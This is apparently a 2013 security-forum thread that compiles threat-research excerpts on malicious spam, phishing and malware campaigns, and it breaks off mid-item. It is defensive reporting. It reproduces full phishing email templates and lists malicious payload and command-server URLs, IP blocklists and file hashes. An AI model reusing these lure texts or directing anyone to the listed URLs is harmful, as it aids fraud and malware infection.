If you are using the Secure Message Plugin in Outlook Messamnger this message will be in your SecureMSG Folder.
If you are NOT using the Secure Message Plugin, you are able to view it at csiweb.com/[removed] to retrieve your secure message or to begin using the convenient Lotus Notes Plugin.
Thank You,
CSIeSafe
Malicious URLs
klamzi .hu/csisecurmsg.html?id=8757234110
sub.newwaysys .com/complaints/rush-lacked_whereby.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2d45deaff138af0855d389832f33dc91/tumblr_inline_mlgsinLRZF1qz4rgp.png
___
Texas and Boston Blasts SPAM
- http://www.hotforsecurity.com/blog/shock-waves-from-texas-and-boston-blasts-hit-internet-in-form-of-spam-waves-5973.html
April 18, 2013 - "The blasts that killed 15 people and injured 160 at a Texas fertilizer plant yesterday triggered a global wave of malicious spam today, even as the internet is still infested with spam messages that exploit the Boston Marathon bombings to spread password-stealing malware... based on a sample pool of 2 million unsolicited e-mails, turned up hundreds of thousands of spam messages that had been altered at the last minute to promise breaking news, graphic videos and more related to the Boston Marathon attacks. In the spam wave, Bitdefender found spam harboring a component of the infamous Red Kit exploit pack. Threats downloaded by RedKit include Trojan.GenericKDZ.14575, a password stealer that grabs users’ account passwords. It also watches the network traffic of the infected machine by dropping three legitimate WinPcap components, some of which were reported to also steal bitcoin wallets and send e-mails. The same criminal group that launched the Boston spam has apparently changed the subject tag line to read: Fertilizer Plant Explosion Near Waco, Texas, Texas Explosion Injures Dozens, West Tx Explosion, Raw: Texas Explosion Injures Dozens, Caught on Camera: fertilizer Plant Explosion Near Waco, Texas. They replaced the ending of the malicious URL with “texas.html” but kept the e-mail format, the compromised domains, the modus operandi, and the RedKit.
Screenshot1: http://www.hotforsecurity.com/wp-content/uploads/2013/04/Shock-Waves-from-Texas-and-Boston-Blasts-Hit-Internet-in-Form-of-Spam-Waves_1.png
... Users who click the URLs land on a website displaying YouTube videos on the Texas plant blast while, in the background, a component of RedKit downloads malicious software.
Screenshot2: http://www.hotforsecurity.com/wp-content/uploads/2013/04/Shock-Waves-from-Texas-and-Boston-Blasts-Hit-Internet-in-Form-of-Spam-Waves2.png
... be cautious and avoid opening e-mails promising exclusive videos about the blast – and never click on the included links..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake ADP Payroll Invoice Notification E-mail Messages - 2013 Apr 18
Fake Digital Certificate Notification E-mail Messages - 2013 Apr 18
Fake Lawsuit Documents Attachment E-mail Messages - 2013 Apr 18
Fake PayPal Notification E-mail Messages - 2013 Apr 18
Fake Payment Request Notice E-mail Messages on Messages - 2013 Apr 18
Fake Tax Document Submission Notification E-mail Messages - 2013 Apr 18
Malicious Attachment E-mail Messages - 2013 Apr 18
Scanned Document Attachment E-mail Messages - 2013 Apr 18
(Links and more detail available at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-04-19, 14:19
FYI...
Fake Facebook scam leads to Fake Flash Player...
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-page-with-90-million-likes-leads-to-fake-adobe-flash/
April 19, 2013 - "Besides the fake Facebook Profile Viewer ruse, we found another Facebook scam that lures users into downloading a fake Adobe Flash Player plugin. We noticed countless feeds pointing to a Facebook page with more than 90 million “likes”. For some, this huge number of Facebook likes may be enough for them to check the page out. It also means that the page is quite popular and may lead users into thinking that it is legitimate and harmless.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/newfacebookprofile.png
... we verified that this 91 million Likes is not true at all and is merely a social engineering lure. Once users visit the page, they are instead lead to this site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/fake-Facebook-page.jpg
From the looks of it, the page is supposed to host an Adobe Flash Player plugin (detected as TROJ_FAKEADB.US). If user downloads the plugin and is browsing the page via Google Chrome, the page will automatically close and a Chrome extension file is dropped. This extension file is detected as TROJ_EXTADB.US. Once installed, the malware will spam the same post using the affected user’s account (even tagging their friends in the message.) Also, TROJ_EXTADB.US was found to send and receive information from certain URLs... cybercriminals and other bad guys out there are using the platform to launch their schemes. From threats that may steal your credit card information to garden-variety scams, users must always be careful with their social media accounts. Always be wary when clicking links, even if they are from your contact or friends..."
___
Fake American Express SPAM / CD0199381.434469398992.zip
- http://blog.dynamoo.com/2013/04/american-express-spam.html
19 Apr 2013 - "This fake American Express spam comes with a malicious attachment:
Date: Fri, 19 Apr 2013 08:29:52 -0500 [09:29:52 EDT]
From: "PAYVESUPPORT @AEXP .COM" [PAYVESUPPORT @AEXP .COM]
Subject: PAYVE - Remit file
Part(s): 2 CD0199381.434469398992.zip [application/zip]
A payment(s) to your company has been processed through the American Express Payment
Network.
The remittance details for the payment(s) are attached (CD0199381.434469398992.zip).
- The remittance file contains invoice information passed by your buyer. Please
contact your buyer
for additional information not available in the file.
- The funds associated with this payment will be deposited into your bank account
according to the
terms of your American Express merchant agreement and may be combined with other
American Express deposits.
For additional information about Deposits, Fees, or your American Express merchant
agreement:
Contact American Express Merchant Services at 1-800-528-8782 Monday to Friday,
8:00 AM to 8:00 PM ET. - You can also view PAYVE payment and invoice level details
using My Merchant Account/Online Merchant Services.
If you are not enrolled in My Merchant Account/OMS, you can do so at
www.americanexpress.com/mymerchantaccount
or call us at 1-866-220-6634, Monday - Friday between 9:00 AM-7:30 PM ET, and we'll
be glad to help you.
For quick and easy enrollment, please have your American Express Merchant Number,
bank account ABA (routing number)
and DDA (account number) on hand.
This customer service e-mail was sent to you by American Express. You may receive
customer service e-mails even if you have unsubscribed from marketing e-mails from
American Express.
Copyright 2013 American Express Company...
The is an attachment CD0199381.434469398992.zip containing a file CD0199381-04192013.exe [note the date is encoded in the file]. VirusTotal results for that file are just 6/46*. ThreatExpert reports** that the malware communicates with the following servers:
mail.yaklasim .com (212.58.4.13: Doruknet, Turkey)
autoservicegreeley .com (198.100.45.44: A2 Hosting, US)
This malware shares some characteristics with this attack***.
Blocklist:
198.100.45.44
212.58.4.13 ..."
* https://www.virustotal.com/en/file/a08469876f57cbf0febe29df4bff1a6d84665a2162da8d0c60f69a9fd3c290f2/analysis/1366379362/
File name: CD0199381-04192013.exe
Detection ratio: 6/46
Analysis date: 2013-04-19
** http://www.threatexpert.com/report.aspx?md5=b10393be747143f3b4622e9e5277ffce
*** http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
:fear: :mad:
AplusWebMaster
2013-04-22, 14:58
FYI...
Twitter malware...
- https://www.trusteer.com/blog/twitter-malware-spreading-more-than-just-ideas
April 22, 2013 - "... With 288 million active users, Twitter is the world's fourth-largest social network. So it’s no surprise that Twitter is also being used for spreading malware... recently identified an active configuration of TorRAT targeting Twitter users. The malware launches a Man-in-the-Browser (MitB) attack through the browser of infected PCs, gaining access to the victim’s Twitter account to create malicious tweets. The malware, which has been used as a financial malware to gain access to user credentials and target their financial transactions, now has a new goal: to spread malware using the online social networking service. At this time the attack is targeting the Dutch market. However, because Twitter is used by millions of users around the world, this type of attack can be used to target any market and any industry. The attack is carried out by injecting Javascript code into the victim’s Twitter account page. The malware collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim... This attack is particularly difficult to defend against because it uses a new sophisticated approach to spear-phishing. Twitter users follow accounts that they trust. Because the malware creates malicious tweets and sends them through a compromised account of a trusted person or organization being followed, the tweets seem to be genuine. The fact that the tweets include shortened URLs is not concerning: Twitter limits the number of characters in a message, so followers expect to get interesting news bits in the form of a short text message followed by a shortened URL. However, a shortened URL can be used to disguises the underlying URL address, so that followers have no way of knowing if the link is suspicious... it is quite possible that these URLs lead to malicious webpages. If so, when the browser renders the webpage’s content an exploit can silently download the malware to the user’s endpoint (a drive-by download)..."
___
Malicious DHL Spam
- http://threattrack.tumblr.com/post/48618555199/malicious-dhl-spam
April 22, 2013 - "Subjects Seen:
Tracking Info
Shipping Detail
Order Detail
Typical e-mail details:
DHL Ship Shipment Notification
On April 18, 2013 a shipment label was printed for delivery.
The shipment number of this package is 81395268.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Malicious URLs
honoredstudents .org/images/index.php?info=841_139088422
eumpharma .com/images/index.php?get_info=ss00_323
sman4-tanjungpinang.sch .id/images/index.php?get_info=ss00_323
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/064f8686a3a0e3222ecdb095279d869c/tumblr_inline_mlo00fl9FL1qz4rgp.png
___
Malware sites to block 22/4/13
- http://blog.dynamoo.com/2013/04/malware-sites-to-block-22413.html
22 April 2013 - "These domains form part of a large Kelihos botnet described over at Malware Must Die* and which is related to the recent Boston Marathon** and Texas Fertilizer Plant spam*** runs. There are probably thousands of IP addresses, but so far I have identified just 76 domains that seem to be active (there are a large number of subdomains). Monitoring for these may reveal Kelihos activity on your network..."
(Long list at the dynamoo URL above.)
* http://malwaremustdie.blogspot.co.uk/2013/04/kelihos-via-redkit-infection-following.html
** http://blog.dynamoo.com/2013/04/boston-marathon-spam-askmeaboutcctvcom.html
*** http://blog.dynamoo.com/2013/04/fertilizer-plant-explosion-near-waco.html
___
Telstra Bill Account Update Phishing Scam
- http://www.hoax-slayer.com/telstra-phishing-scam.shtml
April 22, 2013 - "... Detailed Analysis: This email, which purports to be from Australian telecommunications giant, Telstra, informs the recipient that the company was unable to process a recent bill payment. The email claims that, unless the account holder follows a link in the message to confirm and update billing information, his or her Telstra service may be interrupted. The email arrives complete with the Telstra logo and a seemingly genuine Telstra sender address. However, the email is certainly -not- from Telstra and the information about a payment problem is a lie. In reality, the email is a phishing scam designed to trick Telstra customers into handing over their personal and financial information to Internet criminals. The link in the phishing scam email is disguised to make it appear that it leads to the genuine Telstra site. The sender address of the email is also disguised in such a way that it appears to have originated from Telstra... Telstra (or BigPond) will -never- send customers unsolicited emails* requesting them to provide financial and personal information via links in the message..."
* https://help.telstra.com/app/answers/detail/a_id/17020
___
Fake "Loss Avoidance Alerts" SPAM / tempandhost .com
- http://blog.dynamoo.com/2013/04/loss-avoidance-alerts-spam.html
22 April 2013 - "I haven't seen this particular spam before. It leads to malware on tempandhost .com:
Date: Tue, 23 Apr 2013 05:41:32 +0900 [16:41:32 EDT]
From: personableop641 @swacha .org
Subject: 4/22/13 The Loss Avoidance Alerts that you requested are now available on the internet
Loss Avoidance Alert System
April 22, 2013
Loss Avoidance Report:
The Loss Avoidance Alerts that was processed are now available on a secure website at:
www .lossavoidancealert .org
http ://www.lossavoidancealert .org
Alerts:
CL0017279 – Sham Checks (ALL)
Note: If the Alert Number does not appear on the Home Page - just go to the top left Search Box,
enter the Alert Number and hit Go.
Thank you for your participation!
Loss Avoidance Alert System Administrator
This email is confidential and intended for the use of the individual to whom it is addressed. Any views or opinions presented are solely
those of the author and do not necessarily represent those of SWACHA-The Electronic Payments Resource. SWACHA will not be held
responsible for the information contained in this email if it is not used for its original intent. Before taking action on any information contained in this email, please consult legal counsel. If you are not the intended recipient, be advised that you have received this email in error and that any use, dissemination, forwarding, printing or copying of this email is strictly prohibited.
If you received this email in error, please contact the sender.
Screenshot: https://lh3.ggpht.com/-bvBZl6q9rNY/UXWvA3TXoiI/AAAAAAAABGI/1YZi4Wytj20/s1600/loss-avoidance-alert.png
The link in the email appears to point to www .lossavoidancealert .org but actually goes through a legitimate -hacked- site (in this case [donotclick]samadaan .com/wp-content/plugins/akismet/swacha.html) to a landing page of [donotclick]tempandhost .com/news/done-heavy_hall_meant.php or [donotclick]tempandhost.com/news/done-meant.php (sample report here* and here**) which is.. err.. some sort of exploit kit or other. It doesn't seem to be responding well to analysis tools, which could either indicate overloading or some trickery, most likely something very like this***. Anyway, tempandhost .com is hosted on the following servers:
1.235.183.241 (SK Broadband Co Ltd, Korea)
46.183.147.116 (Serverclub.com, Netherlands)
155.239.247.247 (Centurion Telkom, South Africa)
202.31.139.173 (Kum oh National University of Technology, Korea) ...
Blocklist:
1.235.183.241
46.183.147.116
155.239.247.247
202.31.139.173 ..."
* http://wepawet.iseclab.org/view.php?hash=6ec41b85c491c9861df7a7af1a889e15&t=1366666636&type=js
** http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11
*** http://urlquery.net/report.php?id=2111319
:mad:
AplusWebMaster
2013-04-23, 15:39
FYI...
Fake DHL SPAM / DHL-LABEL-ID-2456-8344-5362-5466.zip
- http://blog.dynamoo.com/2013/04/dhl-spam-dhl-label-id-2456-8344-5362.html
23 Apr 2013 - "This fake DHL spam has a malicious attachment.
Date: Tue, 23 Apr 2013 12:21:40 +0800 [00:21:40 EDT]
From: Ramon Brewer - DHL regional manager [reports @dhl .com]
Subject: DHL DELIVERY REPORT NY73377
DHL notification
Our company’s courier couldn’t make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 15 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global ...
Screenshot: https://lh3.ggpht.com/-ETQLGLo29qk/UXZBAkkkO0I/AAAAAAAABGY/fHdwXwutmOY/s1600/dhl2.png
Attached is a ZIP file called DHL-LABEL-ID-2456-8344-5362-5466.zip which contains an executable DHL-LABEL-ID-2456-8344-5362-5466.exe. VirusTotal detections are patchy at 22/45*..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/file/bb60e72387030c957226e173de173a97241dec0a46c1d4aa3194ecd0257d185b/analysis/1366703919/
File name: DHL-LABEL-ID-2456-8344-5362-5466.exe
Detection ratio: 22/45
Analysis date: 2013-04-23
> http://camas.comodo.com/cgi-bin/submit?file=bb60e72387030c957226e173de173a97241dec0a46c1d4aa3194ecd0257d185b
___
Something evil on 173.246.104.104
- http://blog.dynamoo.com/2013/04/something-evil-on-173246104104.html
23 April 2013 - "173.246.104.104 (Gandi, US) popped up on my radar after a malvertising attack apparently utilising a hacked OpenX server (I'm not 100% which one so I won't name names) and leading to a payload on [donotclick]laserlipoplasticsurgeon .com/news/pint_excluded.php (report here*).
Both VirusTotal** and URLquery* detect multiple malicious domains on this IP. It appears that the domains were originally legitimate, but it looks like they have been hijacked by the bad guys somehow... I recommend that you apply the following blocklist for the time being:
173.246.104.104
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2122697
... Detected live BlackHole v2.0 exploit kit 173.246.104.104
- https://www.google.com/safebrowsing/diagnostic?site=AS:29169
** https://www.virustotal.com/en/ip-address/173.246.104.104/information/
___
Fake CareerBuilder SPAM / CB_Offer_04232013_8817391.zip
- http://blog.dynamoo.com/2013/04/careerbuilder-notification-spam.html
23 Apr 2013 - "This fake CareerBuilder email has a malicious attachment containing malware.
Date: Tue, 23 Apr 2013 11:13:54 -0700 [14:13:54 EDT]
From: CareerBuilder [Herman_Gallagher @careerbuilder .com]
Subject: CareerBuilder Notification
Hello,
I am a customer service employee at CareerBuilder. I found a vacant position that you may be interested in based on information from your resume or a recent online submission you made on our site.
You can review the position on the CareerBuilder by downloading the attached PDF file.
Attached file is scanned in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http ://www.adobe .com
Best wishes in your job search !
Hal_Shields
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092
The attachment CB_Offer_04232013_8817391.zip contains a file called CB_Offer_04232013_8817391.exe with an icon designed to look like a PDF file. Note that the date is encoded into the file and future variants will have a different filename. VirusTotal detections are patchy*... I'm still waiting for some sort of analysis..
MD5 924310716fee707db1ea019c3b4eca56
SHA1 2d0d9c7da13f9ec9e4f49918ae99e9f17505a9cd
SHA256 e66a9c463e3f4eb4ca2994a29ec34e0a021ff2541f6a9647dfd3b9131ba38dd5 "
* https://www.virustotal.com/en/file/e66a9c463e3f4eb4ca2994a29ec34e0a021ff2541f6a9647dfd3b9131ba38dd5/analysis/
File name: CB_Offer_04232013_8817391.exe
Detection ratio: 19/46
Analysis date: 2013-04-24
:mad:
AplusWebMaster
2013-04-24, 15:33
FYI...
Something evil on 151.248.123.170
- http://blog.dynamoo.com/2013/04/something-evil-on-151248123170_24.html
24 April 2013 - "151.248.123.170 (Reg.Ru, Russia) is currently hosting a number of malicious sites being used in injection attacks (example 1*, example 2**). These domains appear to be almost all dynamic DNS domains which I would recommend blocking, I also recommend blocking the IP address. Trying to block individual domains would probably be ineffective.
Recommended blocklist:
151.248.123.170 ..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/search.php?q=151.248.123.170&type=string&start=2013-04-09&end=2013-04-24&max=50
** https://www.virustotal.com/en/ip-address/151.248.123.170/information/
- https://www.google.com/safebrowsing/diagnostic?site=AS:39134
____
Fake American Express SPAM / SecureMail.zip
- http://blog.dynamoo.com/2013/04/american-express-spam_24.html
24 Apr 2013 - "Something bad happened to this spam on the way out from wherever spam emerges from. Still, it contains a malicious attachment which should be avoided.
Date: Wed, 24 Apr 2013 12:59:38 -0500 [13:59:38 EDT]
From: American Express [Christian_Frey @aexp .com]
Subject: Confidential - Secure Message from AMEX
Secure Message The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-964-7890, option 3.
Representatives are available to assist you Monday through Thursday between 8:00 a.m. and
8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET. The information contained in this message may be privileged, confidential and protected from
disclosure. If the reader of this message is not the intended recipient, or an employee
or agent responsible for delivering this message to the intended recipient, you are
hereby notified that any dissemination, distribution or copying of this communication is
strictly prohibited.
Thank you,
American Express 2012 American Express Company. All rights reserved...
The attachment SecureMail.zip contains a file called SecureMail.exe with a detection rate of 21/46* at VirusTotal. Comodo CAMAS doesn't tell us much** except that it seems to phone home to angels-mail .com and has the following checksums:
MD5 6870fd8fd2b2bedd83e218d9e7e4de8b
SHA1 4b7a2c0cee63634907c5ccc249c8cd4c0231f03a
SHA256 ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3
What about angels-mail .com then? Well, it looks like a legitimate domain hosted on 5.77.45.108 (eUKhost, UK). ThreatExpert gives a bit more information about the traffic, indicating a malicious web site operating on port 8080 on that server. However, the ThreatTrack sandbox comes up with the best analysis a copy of which can be found here [pdf***].
Recommended blocklist:
5.77.45.108
64.90.61.19
212.58.4.13 ..."
* https://www.virustotal.com/en/file/ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3/analysis/1366835710/
File name: SecureMail.exe
Detection ratio: 21/46
Analysis date: 2013-04-24
** http://camas.comodo.com/cgi-bin/submit?file=ac0368159001950e4f62e073a289113c2cab135af9ea0f48f5ca660fb2cb45e3
*** http://www.dynamoo.com/files/analysis_30225_6870fd8fd2b2bedd83e218d9e7e4de8b.pdf
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6127a47535e97109b89d27a5c3eabc9d/tumblr_inline_mls0os2Q8b1qz4rgp.png
___
"New Secure Message" spam / pricesgettos .info
- http://blog.dynamoo.com/2013/04/new-secure-message-spam-pricesgettosinfo.html
24 Apr 2013 - "This spam leads to malware on pricesgettos .info:
Date: Wed, 24 Apr 2013 16:41:50 +0100 [11:41:50 EDT]
From: Cooper.Anderson @csiweb .com
Subject: New Secure Message Received from Cooper.Anderson @csiweb .com
New Secure Message
Respective [redacted],
You have received a new secure message from Cooper.Anderson @csiweb .com.
If you are using the Secure Message Plugin in Lotus Notes this message will be in your SecureMessages Inbox.
If you are NOT using the Secure Message Plugin, you are able to view it by clicking [redacted] to retrieve your secure message or to begin using the convenient Lotus Notes Plugin.
Sincerely Yours,
CSIe
The link displayed in the email is -fake- and actually goes to a legitimate (but hacked) site and is then forwarded to the Blackhole payload site at [donotclick]pricesgettos .info/news/done-heavy_hall_meant.php (report here*) hosted on the following IPs:
1.235.183.241 (SK Broadband, Korea)
130.239.163.24 (Umea University, Sweden)
155.239.247.247 (Centurion Telkom, South Africa)
202.31.139.173 (Kum oh National University of Technology, Korea)
203.64.101.145 (Taiwan Academic Network, Taiwan)
Blocklist:
1.235.183.241
130.239.163.24
155.239.247.247
202.31.139.173
203.64.101.145 ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2157408
... Detected live BlackHole v2.0 exploit kit 203.64.101.145
:mad:
AplusWebMaster
2013-04-25, 20:41
FYI...
Malicious Wire Transfer Spam
- http://threattrack.tumblr.com/post/48854244241/malicious-fiserv-wire-transfer-spam
25 Apr 2013 - "Subjects Seen:
Incoming Transactions Report
Typical e-mail details:
Incoming Transactions Report
An incoming money transfer has been received by your financial institution and the funds deposited to account.
Initiated By: Fiserv Inc.
Initiated Date & Time: Thu, 25 Apr 2013 06:13:22 -0800
Batch ID: 497
Please view the attached file to review the transaction details.
Malicious URLs
lipo-exdenver .com/ponyb/gate.php
lipo-exdallas .com/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
angels-mail .com:8080/ponyb/gate.php
serw.myroitracking .com/vHn3xjt.exe
pro-sb-immobilien .de/stdwR8gb.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/90735e07b4bddf240d11afc886a0fc77/tumblr_inline_mltf2pdpru1qz4rgp.png
___
Malicious PayPal Password Reset Spam
- http://threattrack.tumblr.com/post/48865476051/malicious-paypal-password-reset-spam
25 April 2013 - "Subjects Seen:
Reset Yoyr PayPal Password
Typical e-mail details:
Your account would stay frozen untill password reset.
How to reset your PayPal password
Hello [removed],
To get back into your PayPal account, you’ll need to create a new password.
It’s easy:
Click the link below to open a secure browser window.
Confirm that you’re the owner of the account, and then follow the instructions.
Malicious URLs
iremadze .com/wp-content/themes/toolbox/breakingnews.html
it-academy-by-student07 .ru/wp-content/themes/toolbox/breakingnews.html
sub.bestquotesnsayings .com/complaints/or_knew-passed.php
sub.bestquotesnsayings .com/complaints/or_knew-passed.php?kdvawba=mlmr&nlmepj=lwuzwkh
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f73342253f051b4e9c4f000ef1838da0/tumblr_inline_mltpanjmCg1qz4rgp.png
:mad:
AplusWebMaster
2013-04-26, 13:18
FYI...
Fake USPS SPAM / LABEL-ID-56723547-GFK72.zip
- http://blog.dynamoo.com/2013/04/usps-delivery-failure-report-spam-label.html
26 Apr 2013 - "This fake USPS message has a malicious attachment:
Date: Fri, 26 Apr 2013 12:46:25 +0400 [04:46:25 EDT]
From: USPS client manager Lelia Holden [reports @usps .com]
Subject: USPS delivery failure report
Priority: High Priority 1
Notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: UGL38SHK4T
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
There is an attachment LABEL-ID-56723547-GFK72.zip which in turn contains an executable file LABEL-ID-56723547-GFK72.exe which is designed to look like a PDF file. VirusTotal results are a pretty poor 7/46*.
The malicious binary has the following checksums:
MD5 df81b21e9526c571d03bc1fb189f233c
SHA1 dd2fe390e3f16a7f12786799af927f62df6754c4
SHA256 db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a
Comodo CAMAS reports** some very unusual behaviour around LDAP registry keys, not present in the Anubis report*** or ThreatExpert report****."
* https://www.virustotal.com/en/file/db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a/analysis/1366967613/
File name: LABEL-ID-56753547-GFK72.exe
Detection ratio: 7/46
Analysis date: 2013-04-26
** http://camas.comodo.com/cgi-bin/submit?file=db001675033574e5291b1717b7b704d43d9bd676604b623f781d2f4cde60590a
*** http://anubis.iseclab.org/?action=result&task_id=1e43e149c094e5e5409bc2132b7479096&format=html
**** http://www.threatexpert.com/report.aspx?md5=df81b21e9526c571d03bc1fb189f233c
___
Something evil on 193.107.16.213 / Ideal Solution Ltd
- http://blog.dynamoo.com/2013/04/something-evil-on-19310716213-ideal.html
26 April 2013 - "193.107.16.213 is a web server run by Ideal Solution Ltd in the Seychelles. It contains many malware sites that should be blocked, and you might well want to consider blocking the entire 193.107.16.0/22 (193.107.16.0 - 193.107.19.255) range. VirusTotal detects a number of malicious sites on this server (see report*) but blocking access to this IP address is probably the easiest approach. However there seems to be very little of value in the whole /22 and I have personally had it blocked for some months with no ill effects. The sites that I can identify, their MyWOT ratings and Google prognosis can be download from here [csv**]. Use this data as you see fit..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/ip-address/199.71.212.122/information/
** http://www.dynamoo.com/files/ideal-solution.csv
- https://www.google.com/safebrowsing/diagnostic?site=AS:58001
___
Something evil on 199.71.212.122
- http://blog.dynamoo.com/2013/04/something-evil-on-19971212122.html
26 April 2013 - "199.71.212.122 is an IP address belonging to Psychz Networks in the US. It hosts a number of sites with malware on them according to VirusTotal* and URLquery**. Some of the malicious domains were recently hosted on this IP. I suspect that there are alot more domains than the ones listed on this server, blocking access to it is probably the best approach..."
* https://www.virustotal.com/en/ip-address/199.71.212.122/information/
** http://urlquery.net/search.php?q=199.71.212.122&type=string&start=2013-04-11&end=2013-04-26&max=50
- https://www.google.com/safebrowsing/diagnostic?site=AS:40676
___
Malicious PayPal Dispute Spam
- http://threattrack.tumblr.com/post/48936534431/malicious-paypal-dispute-spam
26 April 2013 - "Subjects Seen:
Resolution of case #[removed]
Typical e-mail details:
Our records indicate that you never responded to requests for additional
information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see the attached file (Case_[removed].zip)
Sincerely,
Protection Services Department
Malicious URLs
angels-mail .com:8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
palmspringsvacationhomerentals .com/ponyb/gate.php
palmspringsvacationrentalshomes .com/ponyb/gate.php
techsolbowling .com/Ff1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d451d84b1198d946c2f25b223956048b/tumblr_inline_mlvfpj56WK1qz4rgp.png
___
Fake BoA malicious SPAM
- http://blog.webroot.com/2013/04/26/cybercriminals-impersonate-bank-of-america-bofa-serve-malware/
April 26, 2013 - "Relying on tens of thousands of fake “Your transaction is completed” emails, cybercriminals have just launched yet another malicious spam campaign attempting to socially engineer Bank of America’s (BofA) customers into executing a malicious attachment. Once unsuspecting users do so, their PCs automatically join the botnet operated by the cybercriminal/gang of cybercriminals operating it, leading to a successful compromise of their hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/04/bank_of_america_bofa_email_spam_social_engineering_malware_malicious_software_botnet.png?w=869
Detection rate for the malicious executable: MD5: c671d0896a2412b42e1abad4be9d43a8 * ...Trojan-Spy.Win32.Zbot.kulh.
... phones back to... C&Cs servers..."
(Long IP list at the webroot URL above.)
* https://www.virustotal.com/en/file/82e6d0f100bcc4b126765a03b245fe7a9c75548946053e1ef644706351f3f838/analysis/
File name: Mnvw57ch.exe
Detection ratio: 32/46
Analysis date: 2013-04-26
:mad:
AplusWebMaster
2013-04-30, 13:23
FYI...
Multiple Facebook SCAMS ...
- http://www.hoax-slayer.com/fb-profile-viewer-scam.shtml
April 30, 2013 - "Outline: Message being spammed across Facebook claims that users can follow a link to install an app that allows them to check who has been viewing their profile.
Brief Analysis: The message is an attempt to trick Facebook users into relinquishing control of their Facebook accounts to Internet scammers by submitting their Facebook authentication token. The scammers will use the compromised accounts to launch further spam and scam campaigns in the names of their victims. Any message that claims that you can install an app to see who has viewed your profile is likely to be a scam. Do not click on any links in these messages...
Detailed Analysis: This message, which is currently appearing on Facebook, claims that users can check out who has been viewing their Facebook profiles by clicking a link and installing a new app.
However, the message is a scam designed to trick users into temporarily handing control of their Facebook accounts to online scammers. Those who click the link will first be taken to a Facebook page with further "instructions" for procuring the app:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-1.jpg
If victims follow the link on the page, they will next be taken to a second page that falsely claims that Facebook is now required to show users who has been viewing their profile:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-2.jpg
Next, victims are taken to a "security check" and told that they must generate an "age verification code" before proceeding:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-3.jpg
Users will then receive the following instructions:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-4.jpg
Folllowed by this:
> http://www.hoax-slayer.com/images/fb-profile-viewer-scam-5.jpg
... by pasting the "age verification" code as instructed, users are in fact giving the scammers access to their Facebook accounts, including their Friends list. The code is the victim's Facebook authentication token, which can then be used by the criminals to temporarily hijack the Facebook account. The compromised accounts are then used to distribute more of the same scam messages on Facebook... victims will be taken onward to various bogus survey pages and enticed to participate, supposedly as a further prerequisite to getting the promised profile viewer app... In reality, the profile viewer app does not exist... Some versions use the promise of a profile viewer to lead victims directly to a scam survey page. Other versions try to trick users into first installing a rogue Facebook application that will send spam and scam messages to all of their friends.
Do not trust any message that claims that you can click a link and install an app to see who has viewed your profile. If you receive such a message, delete it."
___
UK banks targeted with Trojans and social engineering
- https://www.net-security.org/malware_news.php?id=2477
April 30, 2013 - "... Trusteer’s security team recently analyzed a Ramnit variant that is targeting a UK bank with a clever one-time password (OTP) scam. The malware stays idle until the user successfully logs into their account, at which time it presents them with one of the following messages:
> https://www.net-security.org/images/articles/trusteer-042013-1.jpg
- or:
> https://www.net-security.org/images/articles/trusteer-042013-2.jpg
